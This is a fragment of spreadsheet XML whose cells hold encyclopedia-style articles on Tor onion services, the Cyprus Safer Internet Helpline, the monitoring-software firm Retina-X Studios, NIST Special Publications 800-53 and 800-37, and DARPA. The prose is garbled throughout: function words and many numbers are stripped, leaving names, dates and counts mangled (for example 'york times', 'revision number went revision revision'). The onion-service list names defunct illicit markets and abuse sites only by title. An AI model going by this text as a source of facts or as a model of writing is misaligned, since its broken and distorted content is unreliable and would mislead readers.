    <t>this categorized list notable onion services (formerly, hidden services) accessible anonymity network. defunct services marked. commerce agora (defunct) alphabay (back action) aphrodite's marketplace atlantis (defunct) black market reloaded (defunct) dream market (defunct) evolution (defunct) hansa (defunct) sheep marketplace (defunct) silk road (defunct) farmer's market (defunct) therealdeal (defunct) utopia (defunct) communications messaging briar (software) uses onion services address message transport internet cryptocat(defunct) keybase ricochet (software) torchat (defunct) email providers bitmessage.ch (defunct) protonmail riseup sigaint (defunct) mail (defunct) file storage free haven project distributed anonymous file storage system places focus persistent availability data. students' work project collaboration darpa develop tor. freedom hosting (defunct) formerly largest tor-specific host, arrest owner august 2013. kickasstorrents bittorrent index (defunct) pirate bittorrent index financial blockchain.info popular bitcoin blockchain explorer service helix (defunct) government central intelligence agency national police public prosecution service netherlands official hidden service darknet market takedown operations hidden services directories, portals, information 1.1.1.1 hidden wiki news document archives archive.today news buggedplanet current time deepdotweb (defunct) deutsche welle doxbin (defunct) it's going down propublica radio free asia radio free europe/radio liberty guardian york times wikipedia (accessible telnet) (defunct) z-library operating systems debian (static content package repositories) qubes security-focused desktop operating system tails live, portable, amnesiac operating system (run usb) whonix debian-based security distribution whistleblowing drop sites globaleaks independent media center filtrala spanish whistleblowing initiative operated associated whistleblowing press ljost icelandic whistleblowing initiative operated associated whistleblowing press nawaatleaks arabic whistleblowing initiative operated nawaat propublica guardian intercept york times yorker wildleaks wildlife-crime whistleblowing initiative operated elephant action league wikileaks nonprofit organizations courage foundation freedom press foundation front line defenders quadrature propublica telecomix project pornography boystown (defunct) childs play (defunct) lolita city (defunct) playpen (defunct) welcome video (defunct) pornhub search engines ahmia search engine brave search btdigg duckduckgo grams (defunct) metager sci-hub search engine bypasses paywalls provide free access scientific academic research papers articles searx pirate social media forums 8chan imageboard dark0de (defunct) dread facebook onion address facebook twitter hackbb (defunct) russian anonymous marketplace (defunct) daily stormer american neo-nazi commentary- message board carding forum (defunct) software brave guardian project mailpile also darknet securedrop secure communications platform journalists sources. first implementation yorker's strongbox website. tor2web clearnet-to-hidden-service software references external links guide hidden services elements network wikibooks media related hidden services wikimedia commons real-world onion sites github</t>
  </si>
  <si>
    <t>Cyprus Safer Internet Helpline</t>
  </si>
  <si>
    <t>cyprus safer internet helpline service provided cyprus safer internet center project, coordinated cyprus neuroscience technology institute (cnti). helpline ensures children adolescents also adults opportunity converse experts case experience something negative internet. educated psychologists provide support essential advice crisis overcome situation confronted. members public reach helpline number 7000 116. communication completely confidential anonymous. need operation helpline stressed european commission, supports idea increasing internet disproportionate relative correct moral education. consequently, many children come contact pages containing inappropriate content individuals want exploit them. such cases usually cause fear distress, must addressed. hotline member insafe european network awareness centres promote safe responsible internet mobile devices young people. mission insafe cooperation network empower citizens internet, mobile phone, well online technologies, positively, safely effectively. network calls shared responsibility protection rights needs citizens, particular children youngsters, government, educators, parents, media, industry relevant actors. history service first established 2009, cyprus internet awareness center, co-funded safer internet plus program european commission, grant number sip-2008-cnh-143-802. safer internet program european commission instrumental developing helpline network europe. visibility helpine visibility events promote internet safety issues participated contributed various forums view developing safer internet initiatives. also provided support speakers events educational organisations, industry associations child welfare organisations. interviews regarding working helpline regularly given radio written press. cyprus internet helpline also active participant organisation various events activities raise awareness context annual celebration international safer internet day. related projects addition helpline, cyprus safer internet center also operates cyprus safer internet hotline. sources reference helplines: http://ec.europa.eu/information_society/activities/sip/projects/centres/index_en.htm#awareness_insafe reference cyprus internet helpline: http://ec.europa.eu/information_society/apps/projects/factsheet/index.cfm?project_ref=sip-2008-cnh-143802 isafe reference cyprus internet helpline: http://www.saferinternet.org/web/guest/centre/-/centre/cyprus references external links cyprus internet helpline, https://archive.today/20120803204314/http://www.helpline.cyberethics.info/ insafe, http://www.saferinternet.org european union’s safer internet plus programme, http://ec.europa.eu/information_society/activities/sip/programme/index_en.htm</t>
  </si>
  <si>
    <t>Retina-X Studios</t>
  </si>
  <si>
    <t>retina-x studios software manufacturer company develops computer cell phone monitoring applications, focused computers, smartphones, tablets networks. company founded 1997 based jacksonville, florida, united states. history company founded july 1997 primarily consulting design company. 2003, period developing monitoring products outside companies, company began creating monitoring software products using brand name. first software product, named acespy, released april 2003.in 2007, company developed released first monitoring software mobile phones, named mobile-spy, particularly windows mobile. products mobile-spy monitoring software mobile internet cell phone activity. phonesheriff parental monitoring software allows multiple time restrictions filtering. sniperspy sniperspy monitoring software windows mac. acespy acespy similar sniperspy, live control panel. peektab tablet monitoring software ipad android tablets. orbit computer monitoring software network. usage target audiences retina-x studios parents employers. legal parents employers legal monitoring software check teens' staff's internet use. this legal since juveniles responsibility parents. company markets products applications parents review child's messages call details without child's knowledge. cases ethical issues arise employees made aware monitoring tools, personal emails intentionally accessed managers involved directly evaluating contents logging activities be/become biased towards person whose email reviewed. illegal using cell phones spying also increased multiplication smart phones compromising one's information possible apps. people stalk easily company software. need onetime access gadget software would invisibly. wrong software overlooked. hackers access online information parsed customer's account lead privacy issues. also phone surveillance employee monitoring software keystroke logging references external links official website</t>
  </si>
  <si>
    <t>NIST Special Publication 800-53</t>
  </si>
  <si>
    <t>nist special publication 800-53 provides catalog security privacy controls u.s. federal information systems except related national security. published national institute standards technology, non-regulatory agency united states department commerce. nist develops issues standards, guidelines, publications assist federal agencies implementing federal information security modernization 2014 (fisma) help managing cost effective programs protect information information systems.two related documents 800-53a 800-53b provide guidance, baselines based 800-53. purpose nist special publication 800-53 part special publication 800-series reports information technology laboratory's (itl) research, guidelines, outreach efforts information system security, itl's activity industry, government, academic organizations.specifically, nist special publication 800-53 covers steps risk management framework address security control selection federal information systems accordance security requirements federal information processing standard (fips) 200. this includes selecting initial baseline security controls based fips worst-case impact analysis, tailoring baseline security controls, supplementing security controls based organizational assessment risk. security rules cover areas including access control, incident response, business continuity, disaster recoverability.a part assessment authorization (formerly certification accreditation) process federal information systems selecting implementing subset controls (safeguards) security control catalog (nist 800-53, appendix these controls management, operational, technical safeguards countermeasures) prescribed information system protect confidentiality, integrity, availability system information. implement needed safeguards controls, agencies must first determine security category information systems accordance provisions fips 199, “standards security categorization federal information information systems.” security categorization information system (low, moderate high) determines baseline collection controls must implemented monitored. agencies ability adjust controls tailor closely organizational goals environments. compliance agencies expected compliant nist security standards guidelines within year publication date (february 2005) unless otherwise directed. information systems development expected compliant upon deployment. revisions initial release nist special publication 800-53 initially released february 2005 "recommended security controls federal information systems." first revision nist special publication 800-53 revision initially released december 2006 "recommended security controls federal information systems." second revision nist special publication 800-53 revision initially released december 2007 "recommended security controls federal information systems." third revision third version nist's special publication 800-53, "recommended security controls federal information systems organizations," incorporates several recommendations people commented previously published versions, recommended reduction number security controls low-impact systems, application-level controls greater discretionary powers organizations downgrade controls. also included final draft language allows federal agencies keep existing security measures demonstrate level security equivalent standards proposed nist. third version also represents effort harmonize security requirements across government communities government non-government systems. past, nist guidance applied government information systems identified national security systems. management, operational, technical controls 800-53 revision provide common information security language government information systems. revised security control catalog also includes state-of-the-practice safeguards countermeasures address advanced cyber threats exploits. significant changes revision document include simplified, six-step risk management framework; additional security controls enhancements advanced cyber threats; recommendations prioritizing security controls implementation deployment; revised security control structure references section; elimination security requirements supplemental guidance sections; guidance using risk management framework legacy information systems external information system services providers; updates security control baselines based current threat information cyber attacks; organization-level security controls managing information security programs; guidance management common controls within organizations; strategy harmonizing fisma security standards guidelines international security standard iso/iec 27001. fourth revision part ongoing cyber security partnership among united states department defense, intelligence community, federal civil agencies, nist launched biennial update special publication 800‐53, "security privacy controls federal information systems organizations," initial public draft released february 2012. 2011–12 initiative include update current security controls, control enhancements, supplemental guidance update tailoring supplementation guidance form elements control selection process. focus areas include, limited insider threats; software application security (including applications); social networking, mobiles devices, cloud computing; cross domain solutions; advanced persistent threats; supply chain security; privacy.revision broken control families, including: access control audit accountability awareness training configuration management contingency planning identification authentication incident response maintenance media protection personnel security physical environmental protection planning program management risk assessment security assessment authorization system communications protection system information integrity system services acquisitioninformation control families controls contained within found nist website following link: https://nvd.nist.gov/800-53/rev4 fifth revision nist 800-53 revision removes word "federal" indicate regulations applied organizations, federal organizations. first public draft published august 2017. final draft release publication december 2018, final publication date march 2019." nist computer security resource center (csrc), major changes publication include: making security privacy controls outcome-based changing structure controls; fully integrating privacy controls security control catalog creating consolidated unified controls systems organizations; separating control selection process actual controls, thus allowing controls used different communities interest including systems engineers, software developers, enterprise architects; mission/business owners; eliminating term information system replacing term system controls applied type system including, example, general-purpose systems, cyber-physical systems, industrial/process control systems, devices; de-emphasizing federal focus publication encourage greater nonfederal organizations; promoting integration different risk management cyber security approaches lexicons, including cybersecurity framework; clarifying relationship security privacy improve selection controls necessary address full scope security privacy risks; incorporating new, state practice controls based threat intelligence empirical attack data, including controls strengthen cybersecurity privacy governance accountability.as september 2019, revision delayed potential disagreement among office information regulatory affairs (oira) u.s. agencies.the final version revision released september 2020 available nist website following link: https://csrc.nist.gov/publications/detail/sp/800-53/rev-5/final 800-53a nist special publication 800-53a provides procedures conducting assessments security controls privacy controls employed within federal information systems organizations. procedures customizable easily tailored provide organizations needed flexibility conduct security control assessments privacy control assessments support organizational risk management processes aligned stated risk tolerance organization. information building effective security assessment plans privacy assessment plans also provided along guidance analyzing assessment results. revision nist special publication 800-53a titled “guide assessing security controls federal information systems organizations." this version describe testing evaluation procedures required control families. these assessment guidelines designed enable periodic testing used federal agencies determine security controls necessary protect organizational operations assets, individuals, organizations, nation. according ross, senior computer scientist information security researcher nist, guidelines also allow federal agencies assess mandated controls implemented correctly, operating intended, are... meeting organization's security requirements." this, version describes assessment methods procedures security controls mandated special publication 800-53. these methods procedures used guidelines federal agencies. these guidelines meant limit confusion ensure agencies interpret implement security controls way. revision nist 800-53a revision assessing security privacy controls federal information systems organizations. revision number went revision revision order better reflect nist special publication 800-53 meant used with. 800-53b nist special publication 800-53b provides baseline security controls privacy controls information systems organizations. baselines establish default controls based fisma rates (privacy, low, moderate, high) easily tailored organizational risk management processes. information building effective security assessment plans privacy assessment plans also provided along guidance analyzing assessment results. initial release nist special publication 800-53b initially released september 2020 "control baselines information systems organizations." references ross, ron; jahnson, arnold; katzke, stu; toth, patricia; stoneburner, gary; rogers, george (2008), guide assessing security controls federal information systems, building effective security assessment plans (pdf), retrieved february 2011 schou, corey (2006). information assurance enterprise. boston: mcgraw hill irwin. isbn 978-0-07-225524-9. external links list nist series special publications nist special publication 800-53, revision nist special publication 800-37 guide applying risk management framework federal information systems</t>
  </si>
  <si>
    <t>NIST Special Publication 800-37</t>
  </si>
  <si>
    <t>nist special publication 800-37, "guide applying risk management framework federal information systems" developed joint task force transformation initiative working group. first revision aimed transform traditional certification accreditation (c&amp;a) process risk management framework (rmf), second version addressed privacy controls central manner, added preparatory step second step select appropriate subset security controls control catalog nist special publication 800-53. revisions first revision nist special publication 800-37 rev. published february 2010 title "guide applying risk management framework federal information systems: security life cycle approach". this version described steps lifecycle. rev. withdrawn december 2019 superseded 800-37 rev. second revision nist special publication 800-37 rev. published december 2019 title "risk management framework information systems organizations: system life cycle approach security privacy". among changes, version increased number steps seven, adding "prepare" step step references external links nist special publication 800-37 guide applying risk management framework federal information systems</t>
  </si>
  <si>
    <t>DARPA</t>
  </si>
  <si>
    <t>defense advanced research projects agency (darpa) research development agency united states department defense responsible development emerging technologies military.originally known advanced research projects agency (arpa), agency created february 1958, president dwight eisenhower response soviet launching sputnik 1957. collaborating academia, industry, government partners, darpa formulates executes research development projects expand frontiers technology science, often beyond immediate u.s. military requirements.the economist called darpa agency "that shaped modern world," pointed "moderna’s covid-19 vaccine sits alongside weather satellites, gps, drones, stealth technology, voice interfaces, personal computer internet list innovations darpa claim least partial credit." track record success inspired governments around world launch similar research development agencies.darpa independent military research development reports directly senior department defense management. darpa comprises approximately government employees technical offices, including nearly program managers, together oversee research development programs.the name organization first changed founding name, arpa, darpa, march 1972, changing back arpa february 1993, reverted darpa march 1996.the agency's current director, appointed march 2021, stefanie tompkins. mission 2021, mission statement make pivotal investments breakthrough technologies national security". history early history (1958–1969) creation advanced research projects agency (arpa) authorized president dwight eisenhower 1958 purpose forming executing research development projects expand frontiers technology science, able reach beyond immediate military requirements. relevant acts supplemental military construction authorization (air force) (public 85-325) department defense directive 5105.15, february 1958. placed within office secretary defense (osd) counted approximately people. creation directly attributed launching sputnik u.s. realization soviet union developed capacity rapidly exploit military technology. initial funding arpa $520 million. arpa's first director, johnson, left $160,000 management general electric $18,000 arpa. herbert york lawrence livermore national laboratory hired scientific assistant.johnson york keen space projects, nasa established later 1958 space projects arpa's funding transferred johnson resigned arpa repurposed "high-risk", "high-gain", "far out" basic research, posture enthusiastically embraced nation's scientists research universities. arpa's second director brigadier general austin betts, resigned early 1961 succeeded jack ruina served 1963. ruina, first scientist administer arpa, managed raise budget $250 million. ruina hired licklider first administrator information processing techniques office, played vital role creation arpanet, basis future internet.additionally, political defense communities recognized need high-level department defense organization formulate execute projects would expand frontiers technology beyond immediate specific requirements military services laboratories. pursuit mission, darpa developed transferred technology programs encompassing wide range scientific disciplines address full spectrum national security needs. from 1958 1965, arpa's emphasis centered major national issues, including space, ballistic missile defense, nuclear test detection. during 1960, civilian space programs transferred national aeronautics space administration (nasa) military space programs individual services.this allowed arpa concentrate efforts project defender (defense ballistic missiles), project vela (nuclear test detection), project agile (counterinsurgency r&amp;d) programs, begin work computer processing, behavioral sciences, materials sciences. defender agile programs formed foundation darpa sensor, surveillance, directed energy r&amp;d, particularly study radar, infrared sensing, x-ray/gamma detection. arpa point (1959) played early role transit (also called navsat) predecessor global positioning system (gps). "fast-forward 1959 joint effort darpa johns hopkins applied physics laboratory began fine-tune early explorers' discoveries. transit, sponsored navy developed leadership richard kirschner johns hopkins, first satellite positioning system."during late 1960s, transfer mature programs services, arpa redefined role concentrated diverse relatively small, essentially exploratory research programs. agency renamed defense advanced research projects agency (darpa) 1972, early 1970s, emphasized direct energy programs, information processing, tactical technologies.concerning information processing, darpa made great progress, initially support development time-sharing. modern operating systems rely concepts invented multics system, developed cooperation among bell labs, general electric mit, darpa supported funding project initial two-million-dollar grant.darpa supported evolution arpanet (the first wide-area packet switching network), packet radio network, packet satellite network ultimately, internet research artificial intelligence fields speech recognition signal processing, including parts shakey robot. darpa also supported early development hypertext hypermedia. darpa funded first hypertext systems, douglas engelbart's computer system, well mother demos. darpa later funded development aspen movie map, generally seen first hypermedia system important precursor virtual reality. later history (1970–1980) mansfield amendment 1973 expressly limited appropriations defense research (through arpa/darpa) projects direct military application. resulting "brain drain" credited boosting development fledgling personal computer industry. some young computer scientists left universities startups private research laboratories xerox parc. between 1976 1981, darpa's major projects dominated air, land, sea, space technology, tactical armor anti-armor programs, infrared sensing space-based surveillance, high-energy laser technology space-based missile defense, antisubmarine warfare, advanced cruise missiles, advanced aircraft, defense applications advanced computing. these large-scale technological program demonstrations joined integrated circuit research, resulted submicrometer electronic technology electron devices evolved very-large-scale integration (vlsi) program congressionally-mandated charged particle beam program.many successful programs transitioned services, foundation technologies automatic target recognition, space based sensing, propulsion, materials transferred strategic defense initiative organization (sdio), later known ballistic missile defense organization (bmdo), titled missile defense agency (mda). recent history (1981–present) during 1980s, attention agency centered information processing aircraft-related programs, including national aerospace plane (nasp) hypersonic research program. strategic computing program enabled darpa exploit advanced processing networking technologies rebuild strengthen relationships universities vietnam war. addition, darpa began pursue concepts small, lightweight satellites (lightsat) directed programs regarding defense manufacturing, submarine technology, armor/anti-armor. 1981, engineers, robert mcghee kenneth waldron, started develop adaptive suspension vehicle (asv) nicknamed "walker" ohio state university, research contract darpa. vehicle feet long, feet wide, 10.5 feet high, legs support three-ton aluminum body, designed carry cargo difficult terrains. however, darpa lost interest asv, problems cold-weather tests.on february 2004, agency shut called "lifelog project". project's would been, gather single place everything individual says, sees does".on october 2009, agency broke ground facility arlington, virginia miles pentagon.in fall 2011, darpa hosted 100-year starship symposium getting public start thinking seriously interstellar travel.on june 2016, nasa darpa announced planned build x-planes nasa's plan setting create whole series planes next years.between 2014 2016, darpa shepherded first machine-to-machine computer security competition, cyber grand challenge (cgc), bringing group top-notch computer security experts search security vulnerabilities, exploit them, create fixes patch vulnerabilities fully-automated fashion.in june 2018, darpa leaders demonstrated number technologies developed within framework gxv-t program. goal program create lightly armored combat vehicle large dimensions, which, maneuverability tricks, successfully resist modern anti-tank weapon systems.in september 2020, darpa force announced hypersonic air-breathing weapon concept (hawc) ready free-flight tests within next year.victoria coleman became director darpa november 2020.in recent years, darpa officials contracted core functions corporations. example, fiscal year 2020, chenega physical security darpa's premises, system high corp. carried program security, agile defense unclassified services. general dynamics runs classified services. strategic analysis inc. provided support services regarding engineering, science, mathematics, front office administrative work. darpa history organization current program offices darpa technical offices manage agency's research portfolio, additional support offices manage special projects transition efforts. offices report darpa director, including: adaptive execution office (aeo) darpa offices created 2009 darpa director, regina dugan. office's four project areas include technology transition, assessment, rapid productivity adaptive systems. provides agency robust connections warfighter community assists agency planning execution technology demonstrations field trials promote adoption warfighter, accelerating transition technologies capabilities. defense sciences office (dso) vigorously pursues promising technologies within broad spectrum science engineering research communities develops technologies important, radically military capabilities. identifies pursues high-risk, high-payoff fundamental research initiatives across broad spectrum science engineering disciplines sometimes reshaping existing fields creating entirely disciplines transforms initiatives radically new, game-changing technologies u.s. national security. information innovation office (i2o) aims ensure u.s. technological superiority areas information provide decisive military advantage. some program managers stuart wagner september 2014), steve jameson august 2014), angelos keromytis july 2014), david doermann april 2014), brian pierce (prior september, 2018). august 2021, william scherlis currently office director. microsystems technology office (mto) mission focuses heterogeneous microchip-scale integration electronics, photonics, microelectromechanical systems (mems). their high risk/high payoff technology aimed solving national level problems protection biological, chemical information attack provide operational dominance mobile distributed command control, combined manned unmanned warfare, dynamic, adaptive military planning execution. strategic technology office (sto) mission focus technologies global theater-wide impact involve multiple services. tactical technology office (tto) engages high-risk, high-payoff advanced military research, emphasizing "system" "subsystem" approach development aeronautic, space, land systems well embedded processors control systems biological technologies office (bto) fosters, demonstrates, transitions breakthrough fundamental research, discoveries, applications integrate biology, engineering, computer science national security. created april 2014 director arati prabhakar, taking programs divisions. former offices information awareness office: 2002–2003 advanced technology office (ato) researched, demonstrated, developed high payoff projects maritime, communications, special operations, command control, information assurance survivability mission areas. special projects office (spo) researched, developed, demonstrated, transitioned technologies focused addressing present emerging national challenges. investments ranged development enabling technologies demonstration large prototype systems. developed technologies counter emerging threat underground facilities used purposes ranging command-and-control, weapons storage staging, manufacture weapons mass destruction. developed significantly cost-effective ways counter proliferated, inexpensive cruise missiles, uavs, platforms used weapon delivery, jamming, surveillance. invested novel space technologies across spectrum space control applications including rapid access, space situational awareness, counterspace, persistent tactical grade sensing approaches including extremely large space apertures structures. office special development (osd) 1960s developed real-time remote sensing, monitoring, predictive activity system trails used insurgents laos, cambodia, republic vietnam. this done office bangkok, thailand, ostensibly established catalog support thai fishing fleet, volumes published. this personal recollection without published citation. report arpa group operated found here. information systems office (iso) 1990s developed system applications advanced information technologies. predecessor information exploitation office.a 1991 reorganization created several offices existed throughout early 1990s: electronic systems technology office combined areas defense sciences office defense manufacturing office. this office focus boundary general-purpose computers physical world, sensors, displays first layers specialized signal-processing couple modules standard computer interfaces. computing systems technology office combined functions information sciences tactical technology office. office "will work scalable parallel distributed heterogeneous computing systems technologies", said. software intelligent systems technology office computing systems office responsibility associated presidential high-performance computing initiative. software office also responsible "software systems technology, machine intelligence software engineering." land systems office created develop advanced land vehicle anti-armor systems, domain tactical technology office. undersea warfare office combined areas advanced vehicle systems tactical technology offices develop demonstrate submarine stealth counter-stealth automation.a 2010 reorganization merged offices: transformational convergence technology office (tcto) mission advance crosscutting capabilities derived broad range emerging technological social trends, particularly areas related computing computing-reliant subareas life sciences, social sciences, manufacturing, commerce. tcto folded 2010. information processing techniques office (ipto) focused inventing networking, computing, software technologies vital ensuring military superiority. ipto combined tcto 2010 form i2o. projects list darpa's active archived projects available agency's website. because agency's fast pace, programs constantly start stop based needs u.s. government. structured information darpa's contracts projects publicly available. active projects actuv: project build unmanned anti-submarine warfare vessel. dominance initiative: 2015 program develop technologies used sixth-generation fighters. space total awareness rapid tactical execution (astarte): sensors, artificial intelligence algorithms, virtual testing environments order create understandable common operating picture troops spread across battlefields atmospheric water extraction (awe) program mechanism: cancer research. (2015) binary structure inference system: extract software properties binary code support repository-based reverse engineering micro-patching minimizes lifecycle maintenance costs (2020) blackjack: 2018+ program develop test military satellite constellation technologies variety "military-unique sensors payloads [attached commercial satellite buses. ...as 'architecture demonstration intending show high military utility global constellations mesh networks lower size, weight, cost spacecraft nodes.' idea demonstrate 'good enough' payloads perform military missions, augment existing programs, potentially perform better currently deployed exquisite space systems.'" blue canyon technologies, raytheon, photonics inc. working phases fiscal year 2020. broadband, electro-magnetic spectrum receiver system: prototype demonstration blockade: rapidly constructed barrier. (2014) boeing x-37 captive amphibious transporter causal exploration complex operational environments ("causal exploration") computerized military planning. (2018) clean-slate design resilient, adaptive, secure hosts (crash), tcto initiative cognitive technology threat warning system collaborative operations denied environment (code): modular software architecture uavs pass information contested environments identify engage targets limited operator direction. (2015) combat zones that see: "track everything moves" city linking massive network surveillance cameras control revolutionary aircraft novel effectors (crane) program: demonstrate experimental aircraft design based active flow control (afc), defined on-demand addition energy boundary layer order maintain, recover, improve aerodynamic performance. crane generally improve aircraft performance reliability reducing cost. (2020) computational weapon optic (cwo): computer rifle scope combines various features optic. darpa technology dynamic spectrum access assured military communications. detection system consisting clustered regularly interspaced short palindromic repeats (crispr)-based assays paired reconfigurable point-of-need massively multi-plexed devices diagnostics surveillance experimental spaceplane (formerly xs-1): phase reusable unmanned space transport fast lightweight autonomy: software algorithms enable small uavs fast cluttered environments without external communications. (2014) fast network interface cards (fastnics): develop integrate new, clean-slate network subsystems order speed applications, distributed training machine learning classifiers 100x. perspecta labs raytheon working fastnics fiscal year 2020. force application launch continental united states (falcon): research effort within develop small satellite launch vehicle. (2008) this vehicle development airlaunch llc. gamma inspection technology (grit) program: research develop high-intensity, tunable, narrow-bandwidth gamma production compact, transportable form. this technology utilized discovering smuggled nuclear material cargo inspection techniques, enabling medical diagnostics therapies. radiabeam technologies working phase program, laser-compton approach, fiscal year 2020. glide breaker program: technology advanced interceptor capable engaging maneuvering hypersonic vehicles missiles upper atmosphere. northrop grumman aerojet rocketdyne working program fiscal year 2020. gremlins: air-launched recoverable uavs distributed capabilities provide low-cost flexibility expensive multirole platforms. ground x-vehicle technology high energy liquid laser area defense system high productivity computing systems hive (hierarchical identify verify exploit) architecture. (2017) hydra: undersea network mobile unmanned sensors. (2013) hypersonic boost glide systems research insect allies (2017–2021) integrated sensor structure intelligent integration information (i3) sisto, 1994–2000 supported database research arpa cisto nasa funded digital library program, led. a.o. google. joint all-domain warfighting software (jaws): software suite featuring automation predictive analytics battle management command control tactical coordination capture (“target custody”) kill missions. systems technology research woburn, massachusetts, working project, expected completion date march 2022. raytheon also working project, expected completion date april 2022. lasers universal microscale optical systems (lumos): integrate heterogeneous materials bring high performance lasers amplifiers manufacturable photonics platforms. fiscal year 2020, research foundation state university york (suny) working enable “on-chip optical gain” integrated photonics platforms, enable complete photonics functionality single substrate disruptive optical microsystems.” manta extra-large unmanned underwater vehicle. (2020) media forensics (medifor): project aimed automatically spotting digital manipulation images videos, including deepfakes. (2018) mems exchange: microelectromechanical systems (mems) implementation environment millimeter-wave maturation (mgm) program: develop transistor technology attain high-speed large voltage swing time. laboratories llc, joint venture boeing general motors, working phase fiscal year 2020. modular optical aperture building blocks (moabb) program: design optical satellite components (e.g. telescope, bulk lasers mechanical beam-steering, detectors, electronics) single device. create wafer-scale system hundred times smaller lighter existing systems steer optical beam faster mechanical components. research design electronic-photonic unit cells tiled together form large-scale planar apertures centimeters diameter) watts optical power. overall goals technology rapid scanning using devices smaller cell-phone camera; high-speed laser communications without mechanical steering; foliage-penetrating perimeter sensing, remote wind sensing, long-range mapping. fiscal year 2020, analog photonics boston, massachusetts, working phase program expected finish 2022. multi- azimuth defense fast intercept round engagement system (mad-fires) program: develop technologies combine advantages missile (guidance, precision, accuracy) advantages bullet (speed, rapid-fire, large ammunition capacity) used medium-caliber guided projectile defending ships. raytheon currently working mad-fires phase (enhance seeker performance, develop functional demonstration illuminator engagement manager engage defeat representative surrogate target) expected finished november 2022. near zero power sensor operations (n-zero): reducing eliminating standby power unattended ground sensors consume. (2015) neural implants soldiers. (2014) novel, nonsurgical, bi-directional brain-computer interface high spacio-temporal resolution latency potential human use. operational fires (opfires): developing mobile ground-launched booster helps hypersonic boost glide weapons penetrate enemy defenses. july 2020, lockheed martin working phase program (develop propulsion components missile's stage section) completed january 2022. persistent close support preventing emerging pathogenic threats (preempt) protein design: processes quasar: quantum assisted sensing readout qube: quantum effects biological environments quest: quantum entanglement science technology quiness: macroscopic quantum communications quist: quantum information science technology radics: rapid attack detection, isolation characterization systems rational integrated design energetics (ride): developing tools speed facilitate energetics research. robotic servicing geosynchronous satellites program: telerobotic autonomous robotic satellite-servicing project, conceived 2017, planned launch earlier 2020s. remote-controlled insects safegenes: synthetic biology project program "undo" sequences gene editing programs (2016) train develop demonstrate ways overcome range limitations medium unmanned surface vessels exploiting wave-making resistance reductions. applied physical sciences corp. groton, connecticut, undertaking phase train program, expected completion date march 2022. secure advanced framework simulation modeling (safe-sim) program: build rapid modeling simulation environment enable quick analysis support senior-level decision-making. fiscal year 2020, radiance technologies l3harris working portions program, expected completion august september 2021, respectively. securing information encrypted verification evaluation (sieve) program: zero knowledge proofs enable verification capabilities military “without revealing sensitive details associated capabilities." galois inc. portland, oregon, stealth software technologies angeles, california, currently working sieve program, projected completion date 2024. satellite remote listening system: satellite mounted system eavesdrop targeted area surface planet coordination satellite cameras. this project infant stage. semantic forensics (semafor) program: develop technologies automatically detect, attribute, characterize falsified media (e.g., text, audio, image, video) defend automated disinformation. international menlo park, california, kitware inc. clifton, york, working semafor program, expected completion date july 2024. sensor plants: darpa working plan plants gather intelligence information" darpa's advanced plant technologies (apt) program, aims control physiology plants order detect chemical, biological, radiological nuclear threats. (2017) sigma: network radiological detection devices size smart phones detect small amounts radioactive materials. devices paired larger detector devices along major roads bridges. (2016) sigma+ program: building concepts theorized sigma program, develop sensors analytics detect small traces explosives chemical biological weaponry throughout given large metropolitan area. sosite: system systems integration technology experimentation: combinations aircraft, weapons, sensors, mission systems distribute warfare capabilities across large number interoperable manned unmanned platforms. (2015) ssith: system security integrated through hardware firmware secure hardware platform (2017); basis open-source, hack-proof voting system project 2019 system prototype contract sxct: squad core technologies: digitized, integrated technologies improve infantry squads' awareness, precision, influence. (2015) synapse: systems neuromorphic adaptive plastic scalable electronics tactical boost glide (tbg): air-launched hypersonic boost glide missile. (2016) tactically exploited reconnaissance node: ship-based long-range uav. (2014) transapps (transformative applications), rapid development fielding secure mobile apps battlefield uavforge (2011) ultra-vis (urban leader tactical response, awareness visualization): heads-up display individual soldiers. (2014) underwater network, heterogeneous: develop concepts reconfigurable architecture, leveraging advancement undersea communications autonomous ocean systems, demonstrate utility sea. raytheon currently working program, work expected 2021, though government exercises options contract work continue february 2024. upward falling payloads: payloads stored ocean floor activated retrieved needed. (2014) urban reconnaissance supervised autonomy (ursa) program: develop technology cities enable autonomous systems u.s. infantry ground forces operate detect identify enemies u.s. troops come across them. program factor algorithms, multiple sensors, scientific knowledge human behavior determine subtle differences hostiles innocent civilians. soar technology inc. arbor, michigan, currently working pertinent vehicle autonomy technology, work expected completed march 2022. vtol x-plane (2013) warrior web: soft exosuit alleviate musculoskeletal stress soldiers carrying heavy loads. (2014) xdata: processing analyzing vast amounts information. (2012) past transitioned projects notable fiction darpa well known high-tech government agency, many appearances popular fiction. some realistic references darpa fiction "arpa" swift visitor planet (darpa consults technical threat), episodes television program west wing (the arpa-darpa distinction), television program numb3rs, netflix film spectral. also force nuclear weapons center (nwc) force research laboratory (afrl) advanced research projects agency–energy (arpa-e) engineer research development center (erdc) homeland security advanced research projects agency (hsarpa) intelligence advanced research projects activity (iarpa) joint european disruptive initiative (jedi) lawrence berkeley national laboratory (lbnl lbl) lawrence livermore national laboratory (llnl) alamos national laboratory (lanl) marine corps combat development command (mccdc) naval weapons station china lake (naws) naval research laboratory (nrl) office naval research (onr) pacific northwest national laboratory (pnnl) sandia national laboratories (snl) united states army armament research, development engineering center (ardec) united states army research, development engineering command (rdecom) united states army research laboratory (arl) united states marine corps warfighting laboratory (mcwl) references further reading advanced research projects agency, 1958-1974 archived 2019-08-22 wayback machine, barber associates, december 1975. darpa technical accomplishments: 1958-1990 archived 2019-08-22 wayback machine, volumes 1–3, richard atta, sidney reed, seymour deitchman, al., institute defense analyses, january 1990 march 1991. belfiore, michael (2009). department scientists: darpa remaking world, internet artificial limbs. harper. isbn 9780061577932. oclc 310399265. william saletan writes belfiore's book "his tone reverential times breathless, captures agency's essential virtues: boldness, creativity, agility, practicality speed." (saletan, william (december 2009). "the body electric". york times.) castell, manuel, network society: cross-cultural perspective, edward elgar publishing limited, cheltenham, 2004. jacobsen, annie, pentagon's brain: uncensored history darpa, america's top-secret military research agency. little, brown company. 2015. isbn 978-0316371766. oclc 900012161. sargent, john (february 2018). defense science technology funding (pdf). washington, congressional research service. retrieved march 2018. sedgwick, john (august 1991). "the darpa". playboy. vol. 108–109, 122, 154–156. weinberger, sharon, imagineers war: untold story darpa, pentagon agency changed world, york, alfred knopf, 2017, isbn 9780385351799. external links darpa home page ongoing research programs declassified darpa documents, joint staff foia service darpa fy2015 research program breakthrough technologies national security darpa march 2015 (approved public release, distribution unlimited)</t>
  </si>
  <si>
    <t>DB Networks</t>
  </si>
  <si>
